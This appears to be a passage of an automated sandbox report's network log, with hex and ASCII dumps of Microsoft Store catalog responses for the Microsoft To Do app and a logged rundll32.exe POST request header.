                                                                                                                                                                                    2023-01-05 07:59:17 UTC15510INData Raw: 7b 22 42 69 67 49 64 73 22 3a 5b 22 39 4e 42 4c 47 47 48 35 52 35 35 38 22 5d 2c 22 48 61 73 4d 6f 72 65 50 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 50 72 6f 64 75 63 74 73 22 3a 5b 7b 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 32 2d 31 32 2d 32 37 54 30 36 3a 33 30 3a 35 30 2e 35 36 36 30 38 37 39 5a 22 2c 22 4c 6f 63 61 6c 69 7a 65 64 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 7b 22 46 72 61 6e 63 68 69 73 65 73 22 3a 5b 5d 2c 22 49 6d 61 67 65 73 22 3a 5b 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 36 36 35 33 36 33 38 38 30 33 30 36 38 39 37 30 35 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 23 34 30 34 30 34 30 22 2c 22 43 61 70 74 69
                                                                                                                                                                                    Data Ascii: {"BigIds":["9NBLGGH5R558"],"HasMorePages":false,"Products":[{"LastModifiedDate":"2022-12-27T06:30:50.5660879Z","LocalizedProperties":[{"Franchises":[],"Images":[{"FileId":"3066536388030689705","EISListingIdentifier":null,"BackgroundColor":"#404040","Capti
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15514INData Raw: 49 64 22 3a 22 33 30 31 33 32 39 32 39 38 33 32 34 30 35 37 37 32 35 39 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 23 34 30 34 30 34 30 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 39 36 34 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 38 38 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 54 69 6c 65 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 53 41 59 76 76 58 38 75 35 68 4a 79 73 41 78 45 32 52 2b 63 31 66 30 34 52 38 4a 52 4d 66 74 38 7a
                                                                                                                                                                                    Data Ascii: Id":"3013292983240577259","EISListingIdentifier":null,"BackgroundColor":"#404040","Caption":"","FileSizeInBytes":964,"ForegroundColor":"","Height":88,"ImagePositionInfo":"","ImagePurpose":"Tile","UnscaledImageSHA256Hash":"SAYvvX8u5hJysAxE2R+c1f04R8JRMft8z
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15518INData Raw: 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 54 69 6c 65 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 51 4a 54 46 69 79 44 6a 35 36 69 6b 77 6a 37 6c 64 4d 74 61 34 63 42 32 44 39 55 63 33 38 74 67 48 4d 32 4c 43 74 50 2f 30 42 49 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 33 37 39 35 32 2e 31 33 35 31 30 37 39 38 38 38 37 33 30 34 30 37 37 2e 32 33 30 36 33 35 33 38 2d 63 63 35 62 2d 34 38 61 36 2d 38 37 37 62 2d 33 62 38 33 65 32 37 32 32 62 63 65 2e 66 66 33 31 66 39 34 39 2d 38 62 35 38 2d 34 36 61 65 2d 38 39 38 64 2d 64 31 36 37 66 62 33 31 64 38 39 36 22 2c 22 57 69 64 74
                                                                                                                                                                                    Data Ascii: fo":"","ImagePurpose":"Tile","UnscaledImageSHA256Hash":"QJTFiyDj56ikwj7ldMta4cB2D9Uc38tgHM2LCtP/0BI=","Uri":"//store-images.s-microsoft.com/image/apps.37952.13510798887304077.23063538-cc5b-48a6-877b-3b83e2722bce.ff31f949-8b58-46ae-898d-d167fb31d896","Widt
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15522INData Raw: 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 23 34 30 34 30 34 30 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 32 37 33 39 31 36 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 31 35 33 36 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 44 65 73 6b 74 6f 70 2f 31 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 53 63 72 65 65 6e 73 68 6f 74 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 63 6a 4d 30 78 77 68 49 67 5a 34 53 67 6b 69 72 66 41 46 4a 75 37 30 65 50 63 54 77 59 2f 53 63 69 63 42 63 51 51 30 4d 30 76 67 3d 22 2c 22
                                                                                                                                                                                    Data Ascii: ingIdentifier":null,"BackgroundColor":"#404040","Caption":"","FileSizeInBytes":273916,"ForegroundColor":"","Height":1536,"ImagePositionInfo":"Desktop/1","ImagePurpose":"Screenshot","UnscaledImageSHA256Hash":"cjM0xwhIgZ4SgkirfAFJu70ePcTwY/ScicBcQQ0M0vg=","
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15526INData Raw: 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 2e 54 6f 64 6f 73 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 22 2c 22 50 61 63 6b 61 67 65 49 64 65 6e 74 69 74 79 4e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 2e 54 6f 64 6f 73 22 2c 22 50 75 62 6c 69 73 68 65 72 43 65 72 74 69 66 69 63 61 74 65 4e 61 6d 65 22 3a 22 43 4e 3d 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2c 20 4f 3d 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2c 20 4c 3d 52 65 64 6d 6f 6e 64 2c 20 53 3d 57 61 73 68 69 6e 67 74 6f 6e 2c 20 43 3d 55 53 22 2c 22 58 62 6f 78 43 72 6f 73 73 47 65 6e 53 65 74 49 64 22 3a 6e 75 6c 6c 2c 22 58 62 6f 78 43 6f 6e 73 6f 6c 65 47 65 6e
                                                                                                                                                                                    Data Ascii: Properties":{"PackageFamilyName":"Microsoft.Todos_8wekyb3d8bbwe","PackageIdentityName":"Microsoft.Todos","PublisherCertificateName":"CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US","XboxCrossGenSetId":null,"XboxConsoleGen
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15530INData Raw: 69 7a 65 49 6e 42 79 74 65 73 22 3a 34 33 34 36 36 37 35 32 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 45 41 70 70 78 42 75 6e 64 6c 65 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 2e 54 6f 64 6f 73 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 22 2c 22 4d 61 69 6e 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 46 6f 72 44 6c 63 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 75 6c 6c 4e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 2e 54 6f 64 6f 73 5f 31 2e 34 38 2e 32 31 38 39 32 2e 37 30 5f 6e 65 75 74 72 61 6c 5f 7e 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 22 2c 22 50 61 63 6b 61 67 65 49 64 22 3a 22 62 33 64 61 35 31 38 64 2d 37 36 36 34 2d 34 32 65 62 2d 34 31 64 65 2d 65 36 62 39 34 38
                                                                                                                                                                                    Data Ascii: izeInBytes":43466752,"PackageFormat":"EAppxBundle","PackageFamilyName":"Microsoft.Todos_8wekyb3d8bbwe","MainPackageFamilyNameForDlc":null,"PackageFullName":"Microsoft.Todos_1.48.21892.70_neutral_~_8wekyb3d8bbwe","PackageId":"b3da518d-7664-42eb-41de-e6b948
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15534INData Raw: 54 6f 64 6f 73 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 22 2c 22 4d 61 69 6e 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 46 6f 72 44 6c 63 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 75 6c 6c 4e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 2e 54 6f 64 6f 73 5f 32 2e 38 36 2e 35 33 35 30 33 2e 30 5f 6e 65 75 74 72 61 6c 5f 7e 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 22 2c 22 50 61 63 6b 61 67 65 49 64 22 3a 22 39 35 33 65 37 64 61 35 2d 62 38 36 38 2d 34 66 66 66 2d 38 37 39 31 2d 31 63 39 66 32 36 39 39 63 32 39 65 2d 58 38 36 2d 58 38 36 2d 58 36 34 2d 58 36 34 2d 41 72 6d 36 34 2d 41 72 6d 36 34 22 2c 22 50 61 63 6b 61 67 65 52 61 6e 6b 22 3a 33 30 30 32 35 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 5b 7b 22 4d
                                                                                                                                                                                    Data Ascii: Todos_8wekyb3d8bbwe","MainPackageFamilyNameForDlc":null,"PackageFullName":"Microsoft.Todos_2.86.53503.0_neutral_~_8wekyb3d8bbwe","PackageId":"953e7da5-b868-4fff-8791-1c9f2699c29e-X86-X86-X64-X64-Arm64-Arm64","PackageRank":30025,"PlatformDependencies":[{"M
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15538INData Raw: 64 22 3a 22 30 30 31 30 22 2c 22 44 69 73 70 6c 61 79 52 61 6e 6b 22 3a 30 2c 22 52 65 6d 65 64 69 61 74 69 6f 6e 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 7d 2c 7b 22 41 63 74 69 6f 6e 73 22 3a 5b 22 4c 69 63 65 6e 73 65 22 2c 22 42 72 6f 77 73 65 22 2c 22 44 65 74 61 69 6c 73 22 5d 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 41 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 42 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 49 64 22 3a 22 39 50 43 35 51 56 4a 32 4a 30 57 53 22 2c 22 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 43 6c 69 65 6e 74 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 41 6c 6c
                                                                                                                                                                                    Data Ascii: d":"0010","DisplayRank":0,"RemediationRequired":false},{"Actions":["License","Browse","Details"],"AvailabilityASchema":"Availability;3","AvailabilityBSchema":"AvailabilityUnifiedApp;3","AvailabilityId":"9PC5QVJ2J0WS","Conditions":{"ClientConditions":{"All
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15542INData Raw: 53 6b 75 54 69 74 6c 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 54 6f 20 44 6f 3a 20 4c 69 73 74 73 2c 20 54 61 73 6b 73 20 26 20 52 65 6d 69 6e 64 65 72 73 22 2c 22 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 75 73 22 2c 22 4d 61 72 6b 65 74 73 22 3a 5b 22 55 53 22 2c 22 44 5a 22 2c 22 41 52 22 2c 22 41 55 22 2c 22 41 54 22 2c 22 42 48 22 2c 22 42 44 22 2c 22 42 45 22 2c 22 42 52 22 2c 22 42 47 22 2c 22 43 41 22 2c 22 43 4c 22 2c 22 43 4e 22 2c 22 43 4f 22 2c 22 43 52 22 2c 22 48 52 22 2c 22 43 59 22 2c 22 43 5a 22 2c 22 44 4b 22 2c 22 45 47 22 2c 22 45 45 22 2c 22 46 49 22 2c 22 46 52 22 2c 22 44 45 22 2c 22 47 52 22 2c 22 47 54 22 2c 22 48 4b 22 2c 22 48 55 22 2c 22 49 53 22 2c 22 49 4e 22 2c 22 49 44 22 2c 22 49 51 22 2c 22 49 45 22 2c 22 49 4c 22 2c 22
                                                                                                                                                                                    Data Ascii: SkuTitle":"Microsoft To Do: Lists, Tasks & Reminders","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15542INData Raw: 4b 22 2c 22 55 59 22 2c 22 56 45 22 2c 22 41 46 22 2c 22 41 58 22 2c 22 41 4c 22 2c 22 41 53 22 2c 22 41 4f 22 2c 22 41 49 22 2c 22 41 51 22 2c 22 41 47 22 2c 22 41 4d 22 2c 22 41 57 22 2c 22 42 4f 22 2c 22 42 51 22 2c 22 42 41 22 2c 22 42 57 22 2c 22 42 56 22 2c 22 49 4f 22 2c 22 42 4e 22 2c 22 42 46 22 2c 22 42 49 22 2c 22 4b 48 22 2c 22 43 4d 22 2c 22 43 56 22 2c 22 4b 59 22 2c 22 43 46 22 2c 22 54 44 22 2c 22 54 4c 22 2c 22 44 4a 22 2c 22 44 4d 22 2c 22 44 4f 22 2c 22 45 43 22 2c 22 53 56 22 2c 22 47 51 22 2c 22 45 52 22 2c 22 45 54 22 2c 22 46 4b 22 2c 22 46 4f 22 2c 22 46 4a 22 2c 22 47 46 22 2c 22 50 46 22 2c 22 54 46 22 2c 22 47 41 22 2c 22 47 4d 22 2c 22 47 45 22 2c 22 47 48 22 2c 22 47 49 22 2c 22 47 4c 22 2c 22 47 44 22 2c 22 47 50 22 2c 22 47
                                                                                                                                                                                    Data Ascii: K","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","G
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15543INData Raw: 70 65 22 3a 22 57 69 6e 64 6f 77 73 55 70 64 61 74 65 22 2c 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 50 6c 75 67 69 6e 49 64 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 73 22 3a 5b 7b 22 41 70 70 6c 69 63 61 74 69 6f 6e 73 22 3a 5b 7b 22 41 70 70 6c 69 63 61 74 69 6f 6e 49 64 22 3a 22 41 70 70 22 7d 5d 2c 22 41 72 63 68 69 74 65 63 74 75 72 65 73 22 3a 5b 22 78 36 34 22 2c 22 78 38 36 22 2c 22 61 72 6d 22 5d 2c 22 43 61 70 61 62 69 6c 69 74 69 65 73 22 3a 5b 22 69 6e 74 65 72 6e 65 74 43 6c 69 65 6e 74 22 2c 22 70 72 69 76 61 74 65 4e 65 74 77 6f 72 6b 43 6c 69 65 6e 74 53 65 72 76 65 72 22 5d 2c 22 45 78 70 65 72 69 65 6e 63 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 31 39 39 35 32 39 37 30 2c 22
                                                                                                                                                                                    Data Ascii: pe":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x64","x86","arm"],"Capabilities":["internetClient","privateNetworkClientServer"],"ExperienceIds":[],"MaxDownloadSizeInBytes":119952970,"
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15544INData Raw: 62 33 64 38 62 62 77 65 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 72 6f 64 75 63 74 49 64 5c 22 3a 5c 22 36 30 38 38 66 30 30 31 2d 37 37 36 63 2d 34 36 32 65 2d 39 38 34 64 2d 32 35 62 36 33 39 39 63 36 36 30 37 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 61 72 67 65 74 50 6c 61 74 66 6f 72 6d 73 5c 22 3a 5b 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a 32 38 31 34 37 35 30 38 39 30 30 30 30 33 38 34 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 30 37 31 30 33 36 36 32 30 38 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74 61 72 67 65 74 5c 22 3a 35 7d 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 79 70 65 5c 22 3a 37 2c 5c 22 70 6f 6c 69 63 79 5c 22 3a 7b 5c 22 63 61 74 65 67 6f
                                                                                                                                                                                    Data Ascii: b3d8bbwe\",\"content.productId\":\"6088f001-776c-462e-984d-25b6399c6607\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750890000384,\"platform.minVersion\":2814750710366208,\"platform.target\":5}],\"content.type\":7,\"policy\":{\"catego
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15545INData Raw: 22 2c 22 61 72 6d 22 5d 2c 22 43 61 70 61 62 69 6c 69 74 69 65 73 22 3a 5b 22 69 6e 74 65 72 6e 65 74 43 6c 69 65 6e 74 22 2c 22 70 72 69 76 61 74 65 4e 65 74 77 6f 72 6b 43 6c 69 65 6e 74 53 65 72 76 65 72 22 5d 2c 22 45 78 70 65 72 69 65 6e 63 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 35 30 35 30 32 35 33 33 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 34 33 34 36 36 37 35 32 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 41 70 70 78 42 75 6e 64 6c 65 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 2e 54 6f 64 6f 73 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 22 2c 22 4d 61 69 6e 50 61 63 6b 61 67 65 46 61 6d 69
                                                                                                                                                                                    Data Ascii: ","arm"],"Capabilities":["internetClient","privateNetworkClientServer"],"ExperienceIds":[],"MaxDownloadSizeInBytes":50502533,"MaxInstallSizeInBytes":43466752,"PackageFormat":"AppxBundle","PackageFamilyName":"Microsoft.Todos_8wekyb3d8bbwe","MainPackageFami
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15546INData Raw: 64 5c 22 3a 32 38 31 34 37 35 30 38 39 30 30 30 30 33 38 34 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 30 37 31 30 33 36 36 32 30 38 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74 61 72 67 65 74 5c 22 3a 30 7d 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 79 70 65 5c 22 3a 37 2c 5c 22 70 6f 6c 69 63 79 5c 22 3a 7b 5c 22 63 61 74 65 67 6f 72 79 2e 66 69 72 73 74 5c 22 3a 5c 22 61 70 70 5c 22 2c 5c 22 63 61 74 65 67 6f 72 79 2e 73 65 63 6f 6e 64 5c 22 3a 5c 22 50 72 6f 64 75 63 74 69 76 69 74 79 5c 22 2c 5c 22 6f 70 74 4f 75 74 2e 62 61 63 6b 75 70 52 65 73 74 6f 72 65 5c 22 3a 66 61 6c 73 65 2c 5c 22 6f 70 74 4f 75 74 2e 72 65 6d 6f 76 65 61 62 6c 65 4d 65 64 69 61 5c 22 3a 66 61 6c 73 65 7d 2c 5c 22 70 6f 6c 69 63 79 32
                                                                                                                                                                                    Data Ascii: d\":2814750890000384,\"platform.minVersion\":2814750710366208,\"platform.target\":0}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Productivity\",\"optOut.backupRestore\":false,\"optOut.removeableMedia\":false},\"policy2
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15547INData Raw: 65 6e 64 65 64 42 61 63 6b 67 72 6f 75 6e 64 54 61 73 6b 54 69 6d 65 22 2c 22 65 6e 74 65 72 70 72 69 73 65 44 61 74 61 50 6f 6c 69 63 79 22 2c 22 72 75 6e 46 75 6c 6c 54 72 75 73 74 22 2c 22 4d 69 63 72 6f 73 6f 66 74 2e 73 74 6f 72 65 46 69 6c 74 65 72 2e 63 6f 72 65 2e 6e 6f 74 53 75 70 70 6f 72 74 65 64 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 22 5d 2c 22 45 78 70 65 72 69 65 6e 63 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 38 38 35 37 38 32 34 34 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 37 38 33 30 33 32 33 32 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 41 70 70 78 42 75 6e 64 6c 65 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a
                                                                                                                                                                                    Data Ascii: endedBackgroundTaskTime","enterpriseDataPolicy","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":88578244,"MaxInstallSizeInBytes":78303232,"PackageFormat":"AppxBundle","PackageFamilyName":
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15548INData Raw: 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 4d 69 63 72 6f 73 6f 66 74 2e 54 6f 64 6f 73 5f 32 2e 38 36 2e 35 33 35 30 33 2e 30 5f 6e 65 75 74 72 61 6c 5f 7e 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 72 6f 64 75 63 74 49 64 5c 22 3a 5c 22 36 30 38 38 66 30 30 31 2d 37 37 36 63 2d 34 36 32 65 2d 39 38 34 64 2d 32 35 62 36 33 39 39 63 36 36 30 37 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 61 72 67 65 74 50 6c 61 74 66 6f 72 6d 73 5c 22 3a 5b 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a 32 38 31 34 37 35 31 30 33 38 35 30 34 39 36 30 2c 5c 22 70 6c 61 74 66 6f 72 6d
                                                                                                                                                                                    Data Ascii: ,\"content.isMain\":false,\"content.packageId\":\"Microsoft.Todos_2.86.53503.0_neutral_~_8wekyb3d8bbwe\",\"content.productId\":\"6088f001-776c-462e-984d-25b6399c6607\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814751038504960,\"platform
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15549INData Raw: 36 2e 35 33 35 30 33 2e 30 5f 78 38 36 5f 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 5c 22 2c 5c 22 73 74 75 62 5c 22 3a 74 72 75 65 2c 5c 22 74 64 66 73 5c 22 3a 5b 7b 5c 22 6e 61 6d 65 5c 22 3a 5c 22 57 69 6e 64 6f 77 73 2e 55 6e 69 76 65 72 73 61 6c 5c 22 2c 5c 22 76 6d 61 78 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 76 6d 69 6e 5c 22 3a 32 38 31 34 37 35 30 38 33 35 32 37 37 38 32 34 7d 5d 7d 2c 7b 5c 22 70 66 75 6e 5c 22 3a 5c 22 4d 69 63 72 6f 73 6f 66 74 2e 54 6f 64 6f 73 5f 30 2e 38 36 2e 35 33 35 30 33 2e 30 5f 78 36 34 5f 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 5c 22 2c 5c 22 73 74 75 62 5c 22 3a 74 72 75 65 2c 5c 22 74 64 66 73 5c 22 3a 5b 7b 5c 22 6e 61 6d 65 5c 22 3a 5c 22 57 69 6e 64 6f 77 73 2e 55 6e 69 76 65 72 73
                                                                                                                                                                                    Data Ascii: 6.53503.0_x86__8wekyb3d8bbwe\",\"stub\":true,\"tdfs\":[{\"name\":\"Windows.Universal\",\"vmax\":2814751014977536,\"vmin\":2814750835277824}]},{\"pfun\":\"Microsoft.Todos_0.86.53503.0_x64__8wekyb3d8bbwe\",\"stub\":true,\"tdfs\":[{\"name\":\"Windows.Univers
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15550INData Raw: 72 65 73 22 3a 6e 75 6c 6c 7d 7d 5d 2c 22 42 75 6e 64 6c 65 64 53 6b 75 73 22 3a 5b 5d 2c 22 49 73 52 65 70 75 72 63 68 61 73 61 62 6c 65 22 3a 66 61 6c 73 65 7d 2c 22 53 6b 75 41 53 63 68 65 6d 61 22 3a 22 53 6b 75 3b 33 22 2c 22 53 6b 75 42 53 63 68 65 6d 61 22 3a 22 53 6b 75 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 53 6b 75 54 79 70 65 22 3a 22 74 72 69 61 6c 22 2c 22 52 65 63 75 72 72 65 6e 63 65 50 6f 6c 69 63 79 22 3a 6e 75 6c 6c 7d 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 69 65 73 22 3a 5b 7b 22 41 63 74 69 6f 6e 73 22 3a 5b 22 44 65 74 61 69 6c 73 22 2c 22 4c 69 63 65 6e 73 65 22 2c 22 46 75 6c 66 69 6c 6c 22 5d 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 41 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61
                                                                                                                                                                                    Data Ascii: res":null}}],"BundledSkus":[],"IsRepurchasable":false},"SkuASchema":"Sku;3","SkuBSchema":"SkuUnifiedApp;3","SkuId":"0011","SkuType":"trial","RecurrencePolicy":null},"Availabilities":[{"Actions":["Details","License","Fulfill"],"AvailabilityASchema":"Availa
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15551INData Raw: 50 49 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 2c 22 4c 69 73 74 50 72 69 63 65 22 3a 30 2e 30 2c 22 4d 53 52 50 22 3a 30 2e 30 2c 22 54 61 78 54 79 70 65 22 3a 22 22 2c 22 57 68 6f 6c 65 73 61 6c 65 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 22 7d 7d 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 7d 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 44 69 73 70 6c 61 79 52 61 6e 6b 22 3a 30 2c 22 52 65 6d 65 64 69 61 74 69 6f 6e 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 7d 2c 7b 22 41 63 74 69 6f 6e 73 22 3a 5b 22 4c 69 63 65 6e 73 65 22 2c 22 44 65 74 61 69 6c 73 22 5d 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 41 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 42 53 63 68 65 6d 61
                                                                                                                                                                                    Data Ascii: PIRequired":false,"ListPrice":0.0,"MSRP":0.0,"TaxType":"","WholesaleCurrencyCode":""}},"Properties":{},"SkuId":"0011","DisplayRank":0,"RemediationRequired":false},{"Actions":["License","Details"],"AvailabilityASchema":"Availability;3","AvailabilityBSchema


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    6192.168.2.44970120.190.159.19443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:03 UTC128OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
